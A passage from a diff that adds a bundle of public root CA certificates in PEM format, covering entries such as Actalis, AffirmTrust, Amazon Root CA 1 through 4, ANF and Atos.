+vV+JHanBsMyZ4k0ACtrJJ1vnE5Bc5PUzolVt3OAJTS+xJlsndQAJxGJ3KQhfnlms +tn6tn1QwIgPBHnFk/vk4CpYY3QIUrCPLBhwepH2NDd4nQeit2hW3sCPdK6jT2iWH +7ehVRE2I9DZ+hJp4rPcOVkkO1jMl1oRQQmwgEh0q1b688nCBpHBgvgW1m54ERL5h +I6zppSSMEYCUWqKiuUnSwdzRp+0xESyeGabu4VXhwOrPDYTkF7eifKXeVSUG7szA +h1xA2syVP1XgNce4hL60Xc16gwFy7ofmXx2utYXGJt/mwZrpHgJHnyqobalbz+xF +d3+YJ5oyXSrjhO7FmGYvliAd3djDJ9ew+f7Zfc3Qn48LFFhRny+Lwzgt3uiP1o2H +pPVWQxaZLPSkVrQ0uGE3ycJYgBugl6H8WY3pEfbRD0tVNEYqi4Y7 +-----END CERTIFICATE----- + +# Actalis Authentication Root CA +-----BEGIN CERTIFICATE----- +MIIFuzCCA6OgAwIBAgIIVwoRl0LE48wwDQYJKoZIhvcNAQELBQAwazELMAkGA1UE +BhMCSVQxDjAMBgNVBAcMBU1pbGFuMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8w +MzM1ODUyMDk2NzEnMCUGA1UEAwweQWN0YWxpcyBBdXRoZW50aWNhdGlvbiBSb290 +IENBMB4XDTExMDkyMjExMjIwMloXDTMwMDkyMjExMjIwMlowazELMAkGA1UEBhMC +SVQxDjAMBgNVBAcMBU1pbGFuMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1 +ODUyMDk2NzEnMCUGA1UEAwweQWN0YWxpcyBBdXRoZW50aWNhdGlvbiBSb290IENB +MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAp8bEpSmkLO/lGMWwUKNv +UTufClrJwkg4CsIcoBh/kbWHuUA/3R1oHwiD1S0eiKD4j1aPbZkCkpAW1V8IbInX +4ay8IMKx4INRimlNAJZaby/ARH6jDuSRzVju3PvHHkVH3Se5CAGfpiEd9UEtL0z9 +KK3giq0itFZljoZUj5NDKd45RnijMCO6zfB9E1fAXdKDa0hMxKufgFpbOr3JpyI/ +gCczWw63igxdBzcIy2zSekciRDXFzMwujt0q7bd9Zg1fYVEiVRvjRuPjPdA1Yprb +rxTIW6HMiRvhMCb8oJsfgadHHwTrozmSBp+Z07/T6k9QnBn+locePGX2oxgkg4YQ +51Q+qDp2JE+BIcXjDwL4k5RHILv+1A7TaLndxHqEguNTVHnd25zS8gebLra8Pu2F +be8lEfKXGkJh90qX6IuxEAf6ZYGyojnP9zz/GPvG8VqLWeICrHuS0E4UT1lF9gxe +KF+w6D9Fz8+vm2/7hNN3WpVvrJSEnu68wEqPSpP4RCHiMUVhUE4Q2OM1fEwZtN4F +v6MGn8i1zeQf1xcGDXqVdFUNaBr8EBtiZJ1t4JWgw5QHVw0U5r0F+7if5t+L4sbn +fpb2U8WANFAoWPASUHEXMLrmeGO89LKtmyuy/uE5jF66CyCU3nuDuP/jVo23Eek7 +jPKxwV2dpAtMK9myGPW1n0sCAwEAAaNjMGEwHQYDVR0OBBYEFFLYiDrIn3hm7Ynz +ezhwlMkCAjbQMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUUtiIOsifeGbt +ifN7OHCUyQICNtAwDgYDVR0PAQH/BAQDAgEGMA0GCSqGSIb3DQEBCwUAA4ICAQAL +e3KHwGCmSUyIWOYdiPcUZEim2FgKDk8TNd81HdTtBjHIgT5q1d07GjLukD0R0i70 +jsNjLiNmsGe+b7bAEzlgqqI0JZN1Ut6nna0Oh4lScWoWPBkdg/iaKWW+9D+a2fDz +WochcYBNy+A4mz+7+uAwTc+G02UQGRjRlwKxK3JCaKygvU5a2hi/a5iB0P2avl4V +SM0RFbnAKVy06Ij3Pjaut2L9HmLecHgQHEhb2rykOLpn7VU+Xlff1ANATIGk0k9j +pwlCCRT8AKnCgHNPLsBA2RF7SOp6AsDT6ygBJlh0wcBzIm2Tlf05fbsq4/aC4yyX +X04fkZT6/iyj2HYauE2yOE+b+h1IYHkm4vP9qdCa6HCPSXrW5b0KDtst842/6+Ok +fcvHlXHo2qN8xcL4dJIEG4aspCJTQLas/kx2z/uUMsA1n3Y/buWQbqCmJqK4LL7R +K4X9p2jIugErsWx0Hbhzlefut8cl8ABMALJ+tguLHPPAUJ4lueAI3jZm/zel0btU +ZCzJJ7VLkn5l/9Mt4blOvH+kQSGQQXemOR/qnuOf0GZvBeyqdn6/axag67XH/JJU +LysRJyU3eExRarDzzFhdFPFqSBX/wge2sY0PjlxQRrM9vwGYT7JZVEc+NHt4bVaT +LnPqZih4zR0Uv6CPLy64Lo7yFIrM6bV8+2ydDKXhlg== +-----END CERTIFICATE----- + +# AffirmTrust Commercial +-----BEGIN CERTIFICATE----- +MIIDTDCCAjSgAwIBAgIId3cGJyapsXwwDQYJKoZIhvcNAQELBQAwRDELMAkGA1UE +BhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZpcm1UcnVz +dCBDb21tZXJjaWFsMB4XDTEwMDEyOTE0MDYwNloXDTMwMTIzMTE0MDYwNlowRDEL +MAkGA1UEBhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZp +cm1UcnVzdCBDb21tZXJjaWFsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC +AQEA9htPZwcroRX1BiLLHwGy43NFBkRJLLtJJRTWzsO3qyxPxkEylFf6EqdbDuKP +Hx6GGaeqtS25Xw2Kwq+FNXkyLbscYjfysVtKPcrNcV/pQr6U6Mje+SJIZMblq8Yr +ba0F8PrVC8+a5fBQpIs7R6UjW3p6+DM/uO+Zl+MgwdYoic+U+7lF7eNAFxHUdPAL +MeIrJmqbTFeurCA+ukV6BfO9m2kVrn1OIGPENXY6BwLJN/3HR+7o8XYdcxXyl6S1 +yHp52UKqK39c/s4mT6NmgTWvRLpUHhwwMmWd5jyTXlBOeuM61G7MGvv50jeuJCqr +VwMiKA1JdX+3KNp1v47j3A55MQIDAQABo0IwQDAdBgNVHQ4EFgQUnZPGU4teyq8/ +nx4P5ZmVvCT2lI8wDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwDQYJ +KoZIhvcNAQELBQADggEBAFis9AQOzcAN/wr91LoWXym9e2iZWEnStB03TX8nfUYG +XUPGhi4+c7ImfU+TqbbEKpqrIZcUsd6M06uJFdhrJNTxFq7YpFzUf1GO7RgBsZNj +vbz4YYCanrHOQnDiqX0GJX0nof5v7LMeJNrjS1UaADs1tDvZ110w/YETifLCBivt +Z8SOyUOyXGsViQK8YvxO8rUzqrJv0wqiUOP2O+guRMLbZjipM1ZI8W0bM40NjD9g +N53Tym1+NH4Nn3J2ixufcv1SNUFFApYvHLKac0khsUlHRUe072o0EclNmsxZt9YC +nlpOZbWUrhvfKbAW8b8Angc6F2S1BLUjIZkKlTuXfO8= +-----END CERTIFICATE----- + +# AffirmTrust Networking +-----BEGIN CERTIFICATE----- +MIIDTDCCAjSgAwIBAgIIfE8EORzUmS0wDQYJKoZIhvcNAQEFBQAwRDELMAkGA1UE +BhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZpcm1UcnVz +dCBOZXR3b3JraW5nMB4XDTEwMDEyOTE0MDgyNFoXDTMwMTIzMTE0MDgyNFowRDEL +MAkGA1UEBhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZp +cm1UcnVzdCBOZXR3b3JraW5nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC +AQEAtITMMxcua5Rsa2FSoOujz3mUTOWUgJnLVWREZY9nZOIG41w3SfYvm4SEHi3y +YJ0wTsyEheIszx6e/jarM3c1RNg1lho9Nuh6DtjVR6FqaYvZ/Ls6rnla1fTWcbua +kCNrmreIdIcMHl+5ni36q1Mr3Lt2PpNMCAiMHqIjHNRqrSK6mQEubWXLviRmVSRL +QESxG9fhwoXA3hA/Pe24/PHxI1Pcv2WXb9n5QHGNfb2V1M6+oF4nI979ptAmDgAp +6zxG8D1gvz9Q0twmQVGeFDdCBKNwV6gbh+0t+nvujArjqWaJGctB+d1ENmHP4ndG +yH329JKBNv3bNPFyfvMMFr20FQIDAQABo0IwQDAdBgNVHQ4EFgQUBx/S55zawm6i +QLSwelAQUHTEyL0wDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwDQYJ +KoZIhvcNAQEFBQADggEBAIlXshZ6qML91tmbmzTCnLQyFE2npN/svqe++EPbkTfO +tDIuUFUaNU52Q3Eg75N3ThVwLofDwR1t3Mu1J9QsVtFSUzpE0nPIxBsFZVpikpzu +QY0x2+c06lkh1QF612S4ZDnNye2v7UsDSKegmQGA3GWjNq5lWUhPgkvIZfFXHeVZ +Lgo/bNjR9eUJtGxUAArgFU2HdW23WJZa3W3SAKD0m0i+wzekujbgfIeFlxoVot4u +olu9rxj5kFDNcFn4J2dHy8egBzp90SxdbBk6ZrV9/ZFvgrG+CJPbFEfxojfHRZ48 +x3evZKiT3/Zpg4Jg8klCNO1aAFSFHBY2kgxc+qatv9s= +-----END CERTIFICATE----- + +# AffirmTrust Premium +-----BEGIN CERTIFICATE----- +MIIFRjCCAy6gAwIBAgIIbYwURrGmCu4wDQYJKoZIhvcNAQEMBQAwQTELMAkGA1UE +BhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MRwwGgYDVQQDDBNBZmZpcm1UcnVz +dCBQcmVtaXVtMB4XDTEwMDEyOTE0MTAzNloXDTQwMTIzMTE0MTAzNlowQTELMAkG +A1UEBhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MRwwGgYDVQQDDBNBZmZpcm1U +cnVzdCBQcmVtaXVtMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxBLf +qV/+Qd3d9Z+K4/as4Tx4mrzY8H96oDMq3I0gW64tb+eT2TZwamjPjlGjhVtnBKAQ +JG9dKILBl1fYSCkTtuG+kU3fhQxTGJoeJKJPj/CihQvL9Cl/0qRY7iZNyaqoe5rZ ++jjeRFcV5fiMyNlI4g0WJx0eyIOFJbe6qlVBzAMiSy2RjYvmia9mx+n/K+k8rNrS +s8PhaJyJ+HoAVt70VZVs+7pk3WKL3wt3MutizCaam7uqYoNMtAZ6MMgpv+0GTZe5 +HMQxK9VfvFMSF5yZVylmd2EhMQcuJUmdGPLu8ytxjLW6OQdJd/zvLpKQBY0tL3d7 +70O/Nbua2Plzpyzy0FfuKE4mX4+QaAkvuPjcBukumj5Rp9EixAqnOEhss/n/fauG +V+O61oV4d7pD6kh/9ti+I20ev9E2bFhc8e6kGVQa9QPSdubhjL08s9NIS+LI+H+S +qHZGnEJlPqQewQcDWkYtuJfzt9WyVSHvutxMAJf7FJUnM7/oQ0dG0giZFmA7mn7S +5u046uwBHjxIVkkJx0w3AJ6IDsBz4W9m6XJHMD4Q5QsDyZpCAGzFlH5hxIrff4Ia +C1nEWTJ3s7xgaVY5/bQGeyzWZDbZvUjthB9+pSKPKrhC9IK31FOQeE4tGv2Bb0TX +OwF0lkLgAOIua+rF7nKsu7/+6qqo+Nz2snmKtmcCAwEAAaNCMEAwHQYDVR0OBBYE +FJ3AZ6YMItkm9UWrpmVSESfYRaxjMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/ +BAQDAgEGMA0GCSqGSIb3DQEBDAUAA4ICAQCzV00QYk465KzquByvMiPIs0laUZx2 +KI15qldGF9X1Uva3ROgIRL8YhNILgM3FEv0AVQVhh0HctSSePMTYyPtwni94loMg +Nt58D2kTiKV1NpgIpsbfrM7jWNa3Pt668+s0QNiigfV4Py/VpfzZotReBA4Xrf5B +8OWycvpEgjNC6C1Y91aMYj+6QrCcDFx+LmUmXFNPALJ4fqENmS2NuB2OosSw/WDQ +MKSOyARiqcTtNd56l+0OOF6SL5Nwpamcb6d9Ex1+xghIsV5n61EIJenmJWtSKZGc +0jlzCFfemQa0W50QBuHCAKi4HEoCChTQwUHK+4w1IX2COPKpVJEZNZOUbWo6xbLQ +u4mGk+ibyQ86p3q4ofB4Rvr8Ny/lioTz3/4E2aFooC8k4gmVBtWVyuEklut89pMF +u+1z6S3RdTnX5yTb2E5fQ4+e0BQ5v1VwSJlXMbSc7kqYA5YwH2AG7hsj/oFgIxpH +YoWlzBk0gG+zrBrjn/B7SK3VAdlntqlyk+otZrWyuOQ9PLLvTIzq6we/qzWaVYa8 +GKa1qF60g2xraUDTn9zxw2lrueFtCfTxqlB2Cnp9ehehVZZCmTEJ3WARjQUwfuaO +RtGdFNrHF+QFlozEJLUbzxQHskD4o55BhrwE0GuWyCqANP2/7waj3VjFhT0+j/6e +KeC2uAloGRwYQw== +-----END CERTIFICATE----- + +# AffirmTrust Premium ECC +-----BEGIN CERTIFICATE----- +MIIB/jCCAYWgAwIBAgIIdJclisc/elQwCgYIKoZIzj0EAwMwRTELMAkGA1UEBhMC +VVMxFDASBgNVBAoMC0FmZmlybVRydXN0MSAwHgYDVQQDDBdBZmZpcm1UcnVzdCBQ +cmVtaXVtIEVDQzAeFw0xMDAxMjkxNDIwMjRaFw00MDEyMzExNDIwMjRaMEUxCzAJ +BgNVBAYTAlVTMRQwEgYDVQQKDAtBZmZpcm1UcnVzdDEgMB4GA1UEAwwXQWZmaXJt +VHJ1c3QgUHJlbWl1bSBFQ0MwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQNMF4bFZ0D +0KF5Nbc6PJJ6yhUczWLznCZcBz3lVPqj1swS6vQUX+iOGasvLkjmrBhDeKzQN8O9 +ss0s5kfiGuZjuD0uL3jET9v0D6RoTFVya5UdThhClXjMNzyR4ptlKymjQjBAMB0G +A1UdDgQWBBSaryl6wBE1NSZRMADDav5A1a7WPDAPBgNVHRMBAf8EBTADAQH/MA4G +A1UdDwEB/wQEAwIBBjAKBggqhkjOPQQDAwNnADBkAjAXCfOHiFBar8jAQr9HX/Vs +aobgxCd05DhT1wV/GzTjxi+zygk8N53X57hG8f2h4nECMEJZh0PUUd+60wkyWs6I +flc9nF9Ca/UHLbXwgpP5WW+uZPpY5Yse42O+tYHNbwKMeQ== +-----END CERTIFICATE----- + +# Amazon Root CA 1 +-----BEGIN CERTIFICATE----- +MIIDQTCCAimgAwIBAgITBmyfz5m/jAo54vB4ikPmljZbyjANBgkqhkiG9w0BAQsF +ADA5MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6 +b24gUm9vdCBDQSAxMB4XDTE1MDUyNjAwMDAwMFoXDTM4MDExNzAwMDAwMFowOTEL +MAkGA1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJv +b3QgQ0EgMTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJ4gHHKeNXj +ca9HgFB0fW7Y14h29Jlo91ghYPl0hAEvrAIthtOgQ3pOsqTQNroBvo3bSMgHFzZM +9O6II8c+6zf1tRn4SWiw3te5djgdYZ6k/oI2peVKVuRF4fn9tBb6dNqcmzU5L/qw +IFAGbHrQgLKm+a/sRxmPUDgH3KKHOVj4utWp+UhnMJbulHheb4mjUcAwhmahRWa6 +VOujw5H5SNz/0egwLX0tdHA114gk957EWW67c4cX8jJGKLhD+rcdqsq08p8kDi1L +93FcXmn/6pUCyziKrlA4b9v7LWIbxcceVOF34GfID5yHI9Y/QCB/IIDEgEw+OyQm +jgSubJrIqg0CAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMC +AYYwHQYDVR0OBBYEFIQYzIU07LwMlJQuCFmcx7IQTgoIMA0GCSqGSIb3DQEBCwUA +A4IBAQCY8jdaQZChGsV2USggNiMOruYou6r4lK5IpDB/G/wkjUu0yKGX9rbxenDI +U5PMCCjjmCXPI6T53iHTfIUJrU6adTrCC2qJeHZERxhlbI1Bjjt/msv0tadQ1wUs +N+gDS63pYaACbvXy8MWy7Vu33PqUXHeeE6V/Uq2V8viTO96LXFvKWlJbYK8U90vv +o/ufQJVtMVT8QtPHRh8jrdkPSHCa2XV4cdFyQzR1bldZwgJcJmApzyMZFo6IQ6XU +5MsI+yMRQ+hDKXJioaldXgjUkK642M4UwtBV8ob2xJNDd2ZhwLnoQdeXeGADbkpy +rqXRfboQnoZsG4q5WTP468SQvvG5 +-----END CERTIFICATE----- + +# Amazon Root CA 2 +-----BEGIN CERTIFICATE----- +MIIFQTCCAymgAwIBAgITBmyf0pY1hp8KD+WGePhbJruKNzANBgkqhkiG9w0BAQwF +ADA5MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6 +b24gUm9vdCBDQSAyMB4XDTE1MDUyNjAwMDAwMFoXDTQwMDUyNjAwMDAwMFowOTEL +MAkGA1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJv +b3QgQ0EgMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAK2Wny2cSkxK +gXlRmeyKy2tgURO8TW0G/LAIjd0ZEGrHJgw12MBvIITplLGbhQPDW9tK6Mj4kHbZ +W0/jTOgGNk3Mmqw9DJArktQGGWCsN0R5hYGCrVo34A3MnaZMUnbqQ523BNFQ9lXg +1dKmSYXpN+nKfq5clU1Imj+uIFptiJXZNLhSGkOQsL9sBbm2eLfq0OQ6PBJTYv9K +8nu+NQWpEjTj82R0Yiw9AElaKP4yRLuH3WUnAnE72kr3H9rN9yFVkE8P7K6C4Z9r +2UXTu/Bfh+08LDmG2j/e7HJV63mjrdvdfLC6HM783k81ds8P+HgfajZRRidhW+me +z/CiVX18JYpvL7TFz4QuK/0NURBs+18bvBt+xa47mAExkv8LV/SasrlX6avvDXbR +8O70zoan4G7ptGmh32n2M8ZpLpcTnqWHsFcQgTfJU7O7f/aS0ZzQGPSSbtqDT6Zj +mUyl+17vIWR6IF9sZIUVyzfpYgwLKhbcAS4y2j5L9Z469hdAlO+ekQiG+r5jqFoz +7Mt0Q5X5bGlSNscpb/xVA1wf+5+9R+vnSUeVC06JIglJ4PVhHvG/LopyboBZ/1c6 ++XUyo05f7O0oYtlNc/LMgRdg7c3r3NunysV+Ar3yVAhU/bQtCSwXVEqY0VThUWcI +0u1ufm8/0i2BWSlmy5A5lREedCf+3euvAgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMB +Af8wDgYDVR0PAQH/BAQDAgGGMB0GA1UdDgQWBBSwDPBMMPQFWAJI/TPlUq9LhONm +UjANBgkqhkiG9w0BAQwFAAOCAgEAqqiAjw54o+Ci1M3m9Zh6O+oAA7CXDpO8Wqj2 +LIxyh6mx/H9z/WNxeKWHWc8w4Q0QshNabYL1auaAn6AFC2jkR2vHat+2/XcycuUY ++gn0oJMsXdKMdYV2ZZAMA3m3MSNjrXiDCYZohMr/+c8mmpJ5581LxedhpxfL86kS +k5Nrp+gvU5LEYFiwzAJRGFuFjWJZY7attN6a+yb3ACfAXVU3dJnJUH/jWS5E4ywl +7uxMMne0nxrpS10gxdr9HIcWxkPo1LsmmkVwXqkLN1PiRnsn/eBG8om3zEK2yygm +btmlyTrIQRNg91CMFa6ybRoVGld45pIq2WWQgj9sAq+uEjonljYE1x2igGOpm/Hl +urR8FLBOybEfdF849lHqm/osohHUqS0nGkWxr7JOcQ3AWEbWaQbLU8uz/mtBzUF+ +fUwPfHJ5elnNXkoOrJupmHN5fLT0zLm4BwyydFy4x2+IoZCn9Kr5v2c69BoVYh63 +n749sSmvZ6ES8lgQGVMDMBu4Gon2nL2XA46jCfMdiyHxtN/kHNGfZQIG6lzWE7OE +76KlXIx3KadowGuuQNKotOrN8I1LOJwZmhsoVLiJkO/KdYE+HvJkJMcYr07/R54H +9jVlpNMKVv/1F2Rs76giJUmTtt8AF9pYfl3uxRuw0dFfIRDH+fO6AgonB8Xx1sfT +4PsJYGw= +-----END CERTIFICATE----- + +# Amazon Root CA 3 +-----BEGIN CERTIFICATE----- +MIIBtjCCAVugAwIBAgITBmyf1XSXNmY/Owua2eiedgPySjAKBggqhkjOPQQDAjA5 +MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6b24g +Um9vdCBDQSAzMB4XDTE1MDUyNjAwMDAwMFoXDTQwMDUyNjAwMDAwMFowOTELMAkG +A1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJvb3Qg +Q0EgMzBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABCmXp8ZBf8ANm+gBG1bG8lKl +ui2yEujSLtf6ycXYqm0fc4E7O5hrOXwzpcVOho6AF2hiRVd9RFgdszflZwjrZt6j +QjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgGGMB0GA1UdDgQWBBSr +ttvXBp43rDCGB5Fwx5zEGbF4wDAKBggqhkjOPQQDAgNJADBGAiEA4IWSoxe3jfkr +BqWTrBqYaGFy+uGh0PsceGCmQ5nFuMQCIQCcAu/xlJyzlvnrxir4tiz+OpAUFteM +YyRIHN8wfdVoOw== +-----END CERTIFICATE----- + +# Amazon Root CA 4 +-----BEGIN CERTIFICATE----- +MIIB8jCCAXigAwIBAgITBmyf18G7EEwpQ+Vxe3ssyBrBDjAKBggqhkjOPQQDAzA5 +MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6b24g +Um9vdCBDQSA0MB4XDTE1MDUyNjAwMDAwMFoXDTQwMDUyNjAwMDAwMFowOTELMAkG +A1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJvb3Qg +Q0EgNDB2MBAGByqGSM49AgEGBSuBBAAiA2IABNKrijdPo1MN/sGKe0uoe0ZLY7Bi +9i0b2whxIdIA6GO9mif78DluXeo9pcmBqqNbIJhFXRbb/egQbeOc4OO9X4Ri83Bk +M6DLJC9wuoihKqB1+IGuYgbEgds5bimwHvouXKNCMEAwDwYDVR0TAQH/BAUwAwEB +/zAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0OBBYEFNPsxzplbszh2naaVvuc84ZtV+WB +MAoGCCqGSM49BAMDA2gAMGUCMDqLIfG9fhGt0O9Yli/W651+kI0rz2ZVwyzjKKlw +CkcO8DdZEv8tmZQoTipPNU0zWgIxAOp1AE47xDqUEpHJWEadIRNyp4iciuRMStuW +1KyLa2tJElMzrdfkviT8tQp21KW8EA== +-----END CERTIFICATE----- + +# ANF Secure Server Root CA +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Atos TrustedRoot 2011 +-----BEGIN CERTIFICATE----- +MIIDdzCCAl+gAwIBAgIIXDPLYixfszIwDQYJKoZIhvcNAQELBQAwPDEeMBwGA1UE +AwwVQXRvcyBUcnVzdGVkUm9vdCAyMDExMQ0wCwYDVQQKDARBdG9zMQswCQYDVQQG +EwJERTAeFw0xMTA3MDcxNDU4MzBaFw0zMDEyMzEyMzU5NTlaMDwxHjAcBgNVBAMM +FUF0b3MgVHJ1c3RlZFJvb3QgMjAxMTENMAsGA1UECgwEQXRvczELMAkGA1UEBhMC +REUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCVhTuXbyo7LjvPpvMp +Nb7PGKw+qtn4TaA+Gke5vJrf8v7MPkfoepbCJI419KkM/IL9bcFyYie96mvr54rM +VD6QUM+A1JX76LWC1BTFtqlVJVfbsVD2sGBkWXppzwO3bw2+yj5vdHLqqjAqc2K+ +SZFhyBH+DgMq92og3AIVDV4VavzjgsG1xZ1kCWyjWZgHJ8cblithdHFsQ/H3NYkQ +4J7sVaE3IqKHBAUsR320HLliKWYoyrfhk/WklAOZuXCFteZI6o1Q/NnezG8HDt0L +cp2AMBYHlT8oDv3FdU9T1nSatCQujgKRz3bFmx5VdJx4IbHwLfELn8LVlhgf8FQi +eowHAgMBAAGjfTB7MB0GA1UdDgQWBBSnpQaxLKYJYO7Rl+lwrrw7GWzbITAPBgNV +HRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFKelBrEspglg7tGX6XCuvDsZbNshMBgG +A1UdIAQRMA8wDQYLKwYBBAGwLQMEAQEwDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3 +DQEBCwUAA4IBAQAmdzTblEiGKkGdLD4GkGDEjKwLVLgfuXvTBznk+j57sj1O7Z8j +vZfza1zv7v1Apt+hk6EKhqzvINB5Ab149xnYJDE0BAGmuhWawyfc2E8PzBhj/5kP +DpFrdRbhIfzYJsdHt6bPWHJxfrrhTZVHO8mvbaG0weyJ9rQPOLXiZNwlz6bb65pc +maHFCN795trV1lpFDMS3wrUU77QR/w4VtfX128a961qn8FYiqTxlVMYVqL2Gns2D +lmh6cYGJ4Qvh6hEbaAjMaZ7snkGeRDImeuKHCnE96+RapNLbxc3G3mB/ufNPRJLv +KrcYPqcZ2Qt9sTdBQrC6YB3y/gkRsPCHe6ed +-----END CERTIFICATE----- + +# Atos TrustedRoot Root CA ECC TLS 2021 +-----BEGIN CERTIFICATE----- +MIICFTCCAZugAwIBAgIQPZg7pmY9kGP3fiZXOATvADAKBggqhkjOPQQDAzBMMS4w +LAYDVQQDDCVBdG9zIFRydXN0ZWRSb290IFJvb3QgQ0EgRUNDIFRMUyAyMDIxMQ0w +CwYDVQQKDARBdG9zMQswCQYDVQQGEwJERTAeFw0yMTA0MjIwOTI2MjNaFw00MTA0 